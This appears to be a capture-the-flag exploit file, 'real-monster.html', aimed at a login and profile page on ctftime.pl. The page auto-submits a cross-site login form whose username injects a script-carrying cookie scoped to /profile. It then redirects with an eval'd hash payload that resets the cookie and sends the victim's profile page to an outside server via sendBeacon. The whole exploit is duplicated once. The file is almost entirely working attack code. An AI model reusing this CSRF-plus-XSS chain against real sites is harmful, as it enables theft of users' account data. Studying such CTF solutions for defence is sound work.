terjanq/real-monster.html

## real-monster.html
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="https://ctftime.pl/login">
    <input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
    <input name="password" value="123">
</form>


<script>
    (async () =>{
        const sleep = d => new Promise(r=>setTimeout(r,d));
        document.forms[0].submit();
        const payload = `
        fetch('/login', {
            headers: {'content-type': 'application/x-www-form-urlencoded'},
            method: 'POST',
            body: 'password=123&username=terjanq","password":"123"};SameSite=none;Secure;Path=/profile;expires=Thu, 01 Jan 1970 00:00:01 GMT;'
        });
        setTimeout(()=>{
            fetch('/profile').then(e=>e.text()).then(e=>navigator.sendBeacon('https://server', e));
        }, 1000);
        `;
        await sleep(2000);
        location = 'https://ctftime.pl/profile#'+escape(payload);
    })();


</script>
	<iframe name="xxx"></iframe>
	<form method=POST target=xxx action="https://ctftime.pl/login">
	<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
	<input name="password" value="123">
	</form>


	<script>
	(async () =>{
	const sleep = d => new Promise(r=>setTimeout(r,d));
	document.forms[0].submit();
	const payload = `
	fetch('/login', {
	headers: {'content-type': 'application/x-www-form-urlencoded'},
	method: 'POST',
	body: 'password=123&username=terjanq","password":"123"};SameSite=none;Secure;Path=/profile;expires=Thu, 01 Jan 1970 00:00:01 GMT;'
	});
	setTimeout(()=>{
	fetch('/profile').then(e=>e.text()).then(e=>navigator.sendBeacon('https://server', e));
	}, 1000);
	`;
	await sleep(2000);
	location = 'https://ctftime.pl/profile#'+escape(payload);
	})();



	</script>